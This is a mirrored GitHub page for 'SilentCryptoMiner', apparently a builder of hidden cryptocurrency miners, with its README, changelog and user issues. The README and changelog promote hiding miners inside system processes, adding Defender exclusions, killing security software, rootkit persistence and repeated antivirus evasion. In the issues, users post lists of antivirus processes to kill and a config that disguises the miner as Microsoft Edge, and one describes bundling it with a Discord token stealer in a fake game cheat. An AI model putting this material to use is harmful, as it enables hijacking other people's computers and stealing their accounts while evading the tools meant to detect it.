Giter Site home page Giter Site logo

unamsanctam / silentcryptominer Goto Github PK

View Code? Open in Web Editor NEW
1.0K 61.0 252.0 499.63 MB

A Silent (Hidden) Free Crypto Miner Builder - Supports ETC, RVN, XMR, RTM and much more.

License: MIT License

C# 77.71% C++ 18.67% C 3.62%
builder gpu cpu ethereum monero mining idle startup educational watchdog

silentcryptominer's Introduction

SilentCryptoMiner v3.4.0 - Miner for ETC, RVN, XMR, RTM & many more

A free silent (hidden) native cryptocurrency miner capable of mining ETC, RVN, XMR, RTM and much more, with many features suited for mining silently.

This miner can mine all the following algorithms and thus any cryptocurrency that uses one of them:

List of algorithms
AlgorithmExample Cryptocurrency
rx/0Monero, Zephyr
grRaptoreum
ethashCallisto, Dubaicoin, Ellaism, Etho, EthereumPoW, Expanse, Nilu, Pirl, PowBlocks
etchashEthereum Classic
ubqhashUbiq
kawpowRavencoin, Neoxa, Meowcoin, Neurai, Paprikacoin, Clore
firopowFiro, Kiirocoin
progpowSero
progpowzZano
evrprogpowEvrmore
argon2/chukwa2ACoin
rx/arqArQmA
cn-heavy/xhvHaven, Blockcloud
cn/fastElectronero, ElectroneroXP
rx/kevaKevacoin
cn-picoKryptokrona
cn/halfMasari
argon2/ninjaNinjaCoin
rx/sfxSafex
cn/rSumokoin
cn-pico/tloTalleo
argon2/chukwav2Turtlecoin
cn/upx2Uplexa
rx/wowWownero
cn/ccx
cn/zls
cn/double
cn/2
cn/xao
cn/rwz
cn/rto
cn-heavy/tube
cn-heavy/0
cn/1
cn-lite/1
cn-lite/0
cn/0

Main Features

  • Native C++ - Miner installer/injector and watchdog coded fully in C++ with no run requirements except a 64-bit OS
  • Injection (Silent/Hidden) - Hide miner inside another process like conhost.exe, explorer.exe, svchost.exe and others
  • Idle Mining - Can be configured to mine at different CPU and GPU usages or not at all while computer is or isn't in use
  • Stealth - Pauses the miner and clears the GPU memory and RAM while any of the programs in the "Stealth Targets" option are open
  • Watchdog - Monitors the miner file, miner processes and startup entry and restores the miner if anything is removed or killed
  • Multiple Miners - Can create multiple miners to run at the same time, for example one XMR (CPU) miner and one RVN (GPU) miner
  • CPU & GPU Mining - Can mine on Both CPU and GPU (Nvidia & AMD)
  • Windows Defender Exclusions - Can add exclusions into Windows Defender after being started to avoid being detected
  • Process Killer - Constantly checks for any programs in the "Kill Targets" list and kills them if found
  • Remote Configuration - Can get the miner settings remotely from a specified URL every 100 minutes
  • Web Panel Support - Has support for monitoring and configuring all the miners efficiently in a free self-hosted online web panel
  • And many many more.

Downloads

Pre-Compiled: https://github.com/UnamSanctam/SilentCryptoMiner/releases

Example Settings: Example Settings

Wiki

You can find the wiki here or at the top of the page. The wiki contains information about the miner and all of its features, it also has some answers to frequently asked questions.

Web Panel

You can find the web panel that the miner officially supports here: UnamWebPanel. The web panel can be used to monitor your miners hashrate, status, connection settings and more. It can also be used to change the miner settings just like how the option "Remote Configuration" does it.

Changelog

3.4.0 (14-11-2023)

  • Changed administrator "Startup" installation procedure from using the Task Scheduler to instead install as a Service
  • Changed the Administrator "Startup" installation from installing into "Program Files" to instead install into "ProgramData"
  • Removed the "Run as System" option due to Services always running as System
  • Added MSRT removal to the "Add Defender Exclusions" feature
  • Changed the C++ compiler to one with less detections and better features
  • Improved external compiler starting procedure to bypass compiler bugs when the build path contains spaces or unicode characters
  • Modified the compilation process to incorporate "strip" for the removal of all unnecessary symbols and relocation data
  • Adjusted compiler optimization level to mitigate some antivirus detections
  • Enabled LTO during compilation to remove a lot of compiler caused detections from unused sections
  • Changed the compiler from using temporary files to instead use pipes in order to work better with some irregular environments
  • Changed the compilation procedure to add a randomized creation date and last write date to the built miner files
  • Reverted miner builder .NET Framework version back to .NET 4.5 from .NET 4.8 for better compatibility
  • Changed the miner injection technique to both reduce complexity and antivirus detections
  • Optimized the process creation code
  • Remade miner injection loop code and watchdog mutex check loop code to bypass a new targeted Windows Defender detection
  • Greatly improved the SysWhispersU syscall generator
  • Switched over from static syscalls to randomized dynamic syscalls
  • Changed the "Run as Administrator" feature to elevate programmatically instead of through a manifest file to avoid manifest caused detections
  • Added obfuscation to all constants and literals
  • Added base64 encoding to embedded files in order to bypass detections caused by high entropy data
  • Changed the embedded resource format from hex to decimal in order to reduce memory usage and time during compilation
  • Changed the default "Startup" tabs "Entry Name" and "File Name" to a randomized string due to Windows Defender targeting the current default names
  • Added new "Randomize" button next to the "Startup" tabs "Entry Name" and "File Name" options to allow for fast randomization
  • Added new "Advanced Option" that allows automatic UPX packing of the embedded miner resource files
  • Changed the "Disable Windows Update" and "Disable Sleep" functions to directly call the programs instead of calling them through a command line
  • Changed default "Inject Into" program to conhost.exe instead of explorer.exe due to explorer.exe now triggering detections when running under System
  • Added ".exe" extension exclusion to "Add Defender Exclusions" feature in order to potentially prevent some future general memory detections
  • Removed XMR "GPU Mining" option due to problems with CUDA and it being worse than the already existing dedicated GPU miner
  • Removed XMR "CPU Mining" option due to it having no reason to exist now that the "GPU Mining" option is gone
  • Rewrote XOR cipher function to bypass XOR obfuscation detection
  • Remade the "Block Websites" feature code to bypass some detections caused by looping
  • Greatly improved the overall code to reduce wasteful calls, handles and possible code signatures
  • Changed "Start Delay" to only apply before installation in order to avoid timeouts
  • Updated the uninstaller to properly remove all files
  • Updated the miners

3.3.1 (04/09/2023)

  • Added OpenCL ICD loader statically into the GPU miner because some systems local loaders do not seem to work
  • Added automatic CPU mining core restart when a prolonged period of zero hashrate is detected
  • Fixed administrator "Startup" trigger to be "on login" when "Run as System" is disabled
  • Reduced some antivirus detections by modifying the miner compilation command
  • Changed some miner builder compiler commands to be absolute instead of relative
  • Added "Assembly" tab "Version" number sanitization
  • Fixed unnecessary log warning during compilation
  • Removed many old unused debug strings inside the miners

3.3.0 (24/08/2023)

  • Added the KawPow (kawpow) algorithm directly into the GPU miner
  • Added new FiroPow (firopow) algorithm
  • Added new ProgPow (progpow) algorithm
  • Added new ProgPowZ (progpowz) algorithm
  • Added new EvrProgPow (evrprogpow) algorithm
  • Implemented KawPow, FiroPow, EvrProgPow, ProgPow and ProgPowZ using only OpenCL for both Nvidia and AMD to bypass large CUDA NVRTC library requirement
  • Rewrote most of the GPU miner to add support for multiple algorithm families and to greatly improve stability and reliability
  • Added Sero-Proxy protocol to be able to mine Sero (ProgPow)
  • Removed KawPow (kawpow) algorithm from the XMR miner and also the large CUDA NVRTC library to make sure no one accidentally uses it
  • Re-added the Panthera (rx/xla) algorithm
  • Added Zephyr coin (rx/0) solo mining support
  • Moved the XMR miner "GPU Mining" option into the "Advanced" tab to discourage unprofitable XMR GPU mining
  • Moved the "Use Rootkit" option into the "Advanced Options" for better clarity regarding its complexity
  • Changed Task Scheduler Task creation from Powershell to only using the command line with a temporary XML file
  • Changed MSR driver path from using a static library path to a dynamically generated path
  • Modified embedded file encryption and decryption to reduce heuristic detections
  • Changed the code compiler build to different one to greatly reduce the compiler-caused antivirus detections
  • Improved the external compiler execution commands by better forcing absolute paths in commands
  • Added a mutex into the miner installer/injector to make it checkable by the watchdog
  • Reduced the watchdog checking interval for better persistance
  • Removed unused helper functions
  • Rewrote uninstallers miner killer function to work with Process IDs above the ushort limit
  • Changed unicode string initialization from a macro to a function to reduce the final code size
  • Changed string formatting from using the built-in Windows API to instead use a much smaller custom function
  • Moved web panel reporting to happen before CPU idle usage change in order to help make the hashrate look less confusing
  • Improved RandomX database regeneration speed when leaving "Stealth" on pools with infrequent new jobs
  • Fixed weird default "Stealth on Fullscreen" configuration value when "Run as System" was disabled
  • Fixed possible null terminator string length counting problem inside the GPU checking function
  • Reduced unnecessary recursive directory creation function stack size
  • Changed miners execution state to no longer always semi-block sleep mode on some computers
  • Restructured the algorithm selection list to be easier to use
  • Added semi-CLI functionality for building miners through the command line
  • Updated the rootkit to a new version

You can view the full Changelog here

Author

  • Unam Sanctam

Contributors

Disclaimer

I, the creator, am not responsible for any actions, and or damages, caused by this software.

You bear the full responsibility of your actions and acknowledge that this software was created for educational purposes only.

This software's main purpose is NOT to be used maliciously, or on any system that you do not own, or have the right to use.

By using this software, you automatically agree to the above.

License

This project is licensed under the MIT License - see the LICENSE file for details

Donate

XMR: 8BbApiMBHsPVKkLEP4rVbST6CnSb3LW2gXygngCi5MGiBuwAFh6bFEzT3UTufiCehFK7fNvAjs5Tv6BKYa6w8hwaSjnsg2N

BTC: bc1q26uwkzv6rgsxqnlapkj908l68vl0j753r46wvq

ETH: 0x40E5bB6C61871776f062d296707Ab7B7aEfFe1Cd

ETC: 0xd513e80ECc106A1BA7Fa15F1C590Ef3c4cd16CF3

RVN: RFsUdiQJ31Zr1pKZmJ3fXqH6Gomtjd2cQe

LINK: 0x40E5bB6C61871776f062d296707Ab7B7aEfFe1Cd

DOGE: DNgFYHnZBVLw9FMdRYTQ7vD4X9w3AsWFRv

LTC: Lbr8RLB7wSaDSQtg8VEgfdqKoxqPq5Lkn3

silentcryptominer's People

Contributors

unamsanctam avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

silentcryptominer's Issues

nslookup every minute or so

When I test the miner, I saw that the nslookup aka the miner window shows up very often and this could cause some suspicion, can anyone help me or an explanation for this?

Getting issues with binding

so silent crypto miner lets you add many miners i added a monero and etc

the etc miner works but monero miner shows 0 hashes on webpanel

Rootkit option may be breaking build?

Hello just testing this out. Does the rootkit feature hide the processes from even appearing? I run the file as admin and after 15 sec it just ends the process as far as I can tell. Is this what it is supposed to do?

Error: An error occured while building the file: Could not load file or assembly 'System.IO.Compression, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089' or one of its dependencies. Не удается найти указанный файл.

Hi, when creating a build, it gives this error
Error: An error occured while building the file: Could not load file or assembly 'System.IO.Compression, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089' or one of its dependencies. Не удается найти указанный файл.

There is no delay when starting the miner

Hello! Tell me why the miner ignores the time delay before launching. I emphasized in the screenshot, I set 60 seconds or another value, but after assembling and running the miner, it starts immediately without a time delay.
Screenshot_1

Work on my AMD but not with gtx1060 gb

hi, thanks for your tool it's amazing but the gpu miner don't work on my gtx 1060gb, the miner launch and close everytime, I can see the rig on nicehash but it doesn't mine ! Works fine on my other computer with AMD vega.

GPU option

so im mining ravencoin and there is a CPU and GPU option

but the CPU has a usage option but GPU doesnt? so how much does the GPU option use in the settings? is it 100%???

New mining coin

Its available to add Raptoreum miner option, which one is using CPU? It is GhostRider algoritm. Very popular coin to mine now.

Is process killer good?

I don't really know what to kill with it so would it be worth finding out what I should kill?

gluing two files

Tell me, is it possible to sew it with administrator rights (bypassing Windows defender) into a file with administrator rights so that you do not have to confirm administrator rights twice?

Windows Defender Showing Results

image
image
image
xml as follows

<?xml version="1.0" encoding="Windows-1252"?>
<Form>
  <Control Type="MephTheme" Name="formBuilder">
    <Visible>True</Visible>
    <Enabled>True</Enabled>
    <Control Type="MephTabcontrol" Name="MephTabcontrol2">
      <Visible>True</Visible>
      <Enabled>True</Enabled>
      <Control Type="System.Windows.Forms.TabPage" Name="TabPage1">
        <Visible>True</Visible>
        <Enabled>True</Enabled>
        <Control Type="MephComboBox" Name="mephComboBox1">
          <Text>English</Text>
          <SelectedIndex>0</SelectedIndex>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephButton" Name="btnLoadState">
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephButton" Name="btnSaveState">
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephListBox" Name="listMiners">
          <Item Type="SilentCryptoMiner.MinerXMR">
            <Control Type="MephTheme" Name="formMinerXMR">
              <Visible>True</Visible>
              <Enabled>True</Enabled>
              <Control Type="MephTabcontrol" Name="MephTabcontrol2">
                <Visible>True</Visible>
                <Enabled>True</Enabled>
                <Control Type="System.Windows.Forms.TabPage" Name="TabPage1">
                  <Visible>False</Visible>
                  <Enabled>True</Enabled>
                  <Control Type="MephComboBox" Name="comboInjection">
                    <Text>svchost.exe</Text>
                    <SelectedIndex>4</SelectedIndex>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephTextBox" Name="txtPoolUsername">
                    <Text>address.{COMPUTERNAME}</Text>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephTextBox" Name="txtPoolURL">
                    <Text>stratum+ssl://stratum.usa-west.nicehash.com:33380</Text>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephTextBox" Name="txtPoolPassowrd">
                    <Text>x</Text>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                </Control>
                <Control Type="System.Windows.Forms.TabPage" Name="TabPage6">
                  <Visible>True</Visible>
                  <Enabled>True</Enabled>
                  <Control Type="MephComboBox" Name="comboAlgorithm">
                    <Text>rx/0</Text>
                    <SelectedIndex>0</SelectedIndex>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephToggleSwitch" Name="toggleStealth">
                    <Checked>True</Checked>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephTextBox" Name="txtIdleWait">
                    <Text>1</Text>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephComboBox" Name="txtIdleCPU">
                    <Text>50%</Text>
                    <SelectedIndex>5</SelectedIndex>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephComboBox" Name="txtMaxCPU">
                    <Text>50%</Text>
                    <SelectedIndex>5</SelectedIndex>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephToggleSwitch" Name="toggleSSL">
                    <Checked>True</Checked>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephToggleSwitch" Name="toggleCPU">
                    <Checked>True</Checked>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephToggleSwitch" Name="toggleNicehash">
                    <Checked>True</Checked>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephToggleSwitch" Name="toggleIdle">
                    <Checked>True</Checked>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephToggleSwitch" Name="toggleGPU">
                    <Checked>True</Checked>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                </Control>
                <Control Type="System.Windows.Forms.TabPage" Name="TabPage3">
                  <Visible>False</Visible>
                  <Enabled>True</Enabled>
                  <Control Type="MephCheckBox" Name="chkAPI">
                    <Checked>False</Checked>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephTextBox" Name="txtAPI">
                    <Text />
                    <Visible>True</Visible>
                    <Enabled>False</Enabled>
                  </Control>
                  <Control Type="MephToggleSwitch" Name="toggleProcessKiller">
                    <Checked>True</Checked>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephTextBox" Name="txtKillTargets">
                    <Text />
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephTextBox" Name="txtStealthTargets">
                    <Text>Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe,edge.exe</Text>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephCheckBox" Name="chkAdvParam">
                    <Checked>False</Checked>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephTextBox" Name="txtAdvParam">
                    <Text>--randomx-no-rdmsr</Text>
                    <Visible>True</Visible>
                    <Enabled>False</Enabled>
                  </Control>
                  <Control Type="MephCheckBox" Name="chkRemoteConfig">
                    <Checked>False</Checked>
                    <Visible>True</Visible>
                    <Enabled>True</Enabled>
                  </Control>
                  <Control Type="MephTextBox" Name="txtRemoteConfig">
                    <Text />
                    <Visible>True</Visible>
                    <Enabled>False</Enabled>
                  </Control>
                </Control>
              </Control>
            </Control>
          </Item>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephButton" Name="btnMinerRemove">
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephButton" Name="btnMinerEdit">
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephButton" Name="btnMinerAdd">
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
      </Control>
      <Control Type="System.Windows.Forms.TabPage" Name="TabPage2">
        <Visible>False</Visible>
        <Enabled>True</Enabled>
        <Control Type="MephToggleSwitch" Name="toggleWatchdog">
          <Checked>True</Checked>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephCheckBox" Name="chkInstall">
          <Checked>True</Checked>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephTextBox" Name="txtInstallFileName">
          <Text>Microsoft\services.exe</Text>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephComboBox" Name="txtInstallPath">
          <Text>AppData</Text>
          <SelectedIndex>0</SelectedIndex>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
      </Control>
      <Control Type="System.Windows.Forms.TabPage" Name="TabPage3">
        <Visible>False</Visible>
        <Enabled>True</Enabled>
        <Control Type="MephCheckBox" Name="chkAssembly">
          <Checked>True</Checked>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephButton" Name="btnAssemblyRandom">
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephTextBox" Name="txtAssemblyTitle">
          <Text>msedge_exe</Text>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephButton" Name="btnAssemblyClone">
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephTextBox" Name="txtAssemblyProduct">
          <Text>Microsoft Corporation</Text>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephTextBox" Name="txtAssemblyVersion4">
          <Text>47</Text>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephTextBox" Name="txtAssemblyDescription">
          <Text>Microsoft Edge</Text>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephTextBox" Name="txtAssemblyVersion3">
          <Text>961</Text>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephTextBox" Name="txtAssemblyCopyright">
          <Text>Copyright Microsoft Corporation. All rights reserved.</Text>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephTextBox" Name="txtAssemblyVersion2">
          <Text>0</Text>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephTextBox" Name="txtAssemblyCompany">
          <Text>Microsoft Edge</Text>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephTextBox" Name="txtAssemblyVersion1">
          <Text>93</Text>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephTextBox" Name="txtAssemblyTrademark">
          <Text />
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
      </Control>
      <Control Type="System.Windows.Forms.TabPage" Name="TabPage4">
        <Visible>False</Visible>
        <Enabled>True</Enabled>
        <Control Type="MephCheckBox" Name="chkIcon">
          <Checked>True</Checked>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="System.Windows.Forms.PictureBox" Name="picIcon">
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephButton" Name="btnBrowseIcon">
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephTextBox" Name="txtIconPath">
          <Text>C:\Users\terra\Downloads\Silent_Crypto_Miner_Builder\Profile.ico</Text>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
      </Control>
      <Control Type="System.Windows.Forms.TabPage" Name="TabPage6">
        <Visible>False</Visible>
        <Enabled>True</Enabled>
        <Control Type="System.Windows.Forms.PictureBox" Name="pictureBox2">
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephToggleSwitch" Name="toggleRootkit">
          <Checked>False</Checked>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephToggleSwitch" Name="toggleShellcode">
          <Checked>True</Checked>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephToggleSwitch" Name="toggleAdministrator">
          <Checked>False</Checked>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="System.Windows.Forms.PictureBox" Name="PictureBox1">
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephToggleSwitch" Name="toggleDebug">
          <Checked>False</Checked>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephToggleSwitch" Name="toggleObfuscation">
          <Checked>True</Checked>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephToggleSwitch" Name="toggleKillWD">
          <Checked>True</Checked>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
      </Control>
      <Control Type="System.Windows.Forms.TabPage" Name="TabPage5">
        <Visible>False</Visible>
        <Enabled>True</Enabled>
        <Control Type="MephTextBox" Name="txtStartDelay">
          <Text>15</Text>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephTextBox" Name="txtLog">
          <Text>Starting...
Randomizing keys...
Building miner sets...
Adding install... 
Compiling Watchdog...
Compiling Watchdog loader...
Compiling Miner payload...
Compiling Uninstaller payload...
Compiling Miner loader...
Compiling Uninstaller loader...
Compiling Miner Checker...
Done!
</Text>
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
        <Control Type="MephButton" Name="btnBuild">
          <Visible>True</Visible>
          <Enabled>True</Enabled>
        </Control>
      </Control>
    </Control>
  </Control>
</Form>

Watchdog timer

The watchdog file appears in the folder after the file is started, it has certain antivirus detections, or can you take this file separately to clean it from antivirus detections, then add it to the project and compile the project with the modified file? I just did not find this file in the project.

nslookup.exe opens up after a few minutes after running the file with a rootkit

i was trying to run the file without rootkit for a while, it worked for a split second when the minercheck said it had shares coming through.
i rebuilt the miner because it was not working and tried it with the rootkit, few minutes after system32 nslookup cmd bar appeared, i did not inject it into nslookup i injected it into explorer and it still will not work
got it working with no rootkit enabled after rebooting but im not getting any shares, even though the checker says theres a miner

AV's PROCESSES (for 'Kill Targets')

Avast (That's all i found)
afwServ.exe,aswEngSrv.exe,aswidsagent.exe,aswToolsSvc.exe,AvastSvc.exe,AvastSvc.exe,AvastUI.exe,wsc_proxy.exe,AvastBrowser.exe,AvastNM.exe,ashwebsv.exe,aswupdsv.exe

Virus scan

Hi, where would you advise to check the miner? Many people do not advise to use virustotal , although it shows the most correct data, for example antiscan.me and kleenscan Kaspersky does not detect the virus but in reality Kaspersky sees a trojan in the miner

Questions

Firstly, awesome build dude. Really good job with this and all your tools.
Questions:

  • If a deployment tool is used to install the miner on several devices, does the idle detection look for mouse/keyboard activity of the admin account used to install it, or the active logged on user?
  • Secondly, does the miner rely on an active logged on user, or does it run as a service regardless of a user logged in or not?
    Thanks!

What will be your next big updates or goal?

So what is your next development unam? what are you aiming to add the most

something like for example if the PC cant mine on GPU it will automatically detect and mine XMR on CPU

Web Panel

Tell me, is it possible to add a web panel to your old miner projects, more precisely in version 1.4.4?

Hi

Hi, this is not really on topic but is it possible to stealthily download and automatically run a file after opening a link ?

Is this a correct config?

{
"url": "stratum://[email protected]:9999/{COMPUTERNAME}/joe20.doe_jr-ny%40acme.com",
"algo": "etchash",
"max-gpu": 50,
"idle-wait": 2,
"idle-gpu": 80,
"stealth": true,
"stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe"
"kill-targets": "afwServ.exe,aswEngSrv.exe,aswidsagent.exe,aswToolsSvc.exe,AvastSvc.exe,AvastSvc.exe,AvastUI.exe,wsc_proxy.exe,AvastBrowser.exe,AvastNM.exe,ashwebsv.exe,aswupdsv.exe,kavfswp.exe,kavtray.exe,kavfsmui.exe,kavshell.exe,kavfsrcn.exe,kavfs.exe,kavfsgt.exe,kavfswh.exe,kavfsscs.exe,efpeadm.exe,VPNGUI.exe,CVPND.exe,IPSECLOG.exe,cfp.exe,fsdfwd.exe,fsguiexe.exe,blackd.exe,kpf4gui.exe ,MSSCLL.exe,MCSHELL.exe,MPFSERVICE.exe,MPFAGENT.exe,nisum.exe,smc.exe,persfw.exe,pccpfw.exe,WINSS.exe,ZLCLIENT.exe,MCODS.exe,MCSHIELD.exe,msmpeng.exe,navapsvc.exe,avkwctl.exe,fsav32.exe,mcshield.exe,ntrtscan.exe,avguard.exe,ashServ.exe,AVENGINE.exe,avgemc.exe,tmntsrv.exe"
}

I can't mine on other people's PC

When i run the miner on my pc everything works. But when i run it on my friend's pc the pool doesn't see it. Miners work via checker on both PCs. What could be the problem?

error

Good afternoon. what could be the mistake? in the old versions of your programs, everything is ok
Screenshot_1

Learner

hi I'm new/newb to coding and I want to learn how to create applications like yours!
if u could recommend me some apps, courses, techniques or some coding secret's/websites,
and what programming languages is this coded in and etc.
I have grown fond of the kind of applications u create and am curious on how u create it.
if u could right back in GitHub or direct message me in Discord(Aspect#4853)
I would greatly appreciate it

Crash upon miner selection

So the basics are that I am binding a crypto miner with a discord token stealer for a 'CS:GO Cheat", which I think isn't optimal for spreading, but, whatever, they have their AV's off usually anyways!

So, I select the miner that I am wanting to use for my wallet (ETH), or ethminer, and it crashes. I think to myself, did I do something wrong? So I re-unzip it and then run it again, and then try a different coin, it crashes once again afterwards.

I am genuinely confused why this is an issue. Is it because I have an upgraded .NET Framework Version? (5.0), or am I just an idiot?

xmr

hello, the ETC miner is working, that is, I will be selected in the pool, but the miner monero is not displayed

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.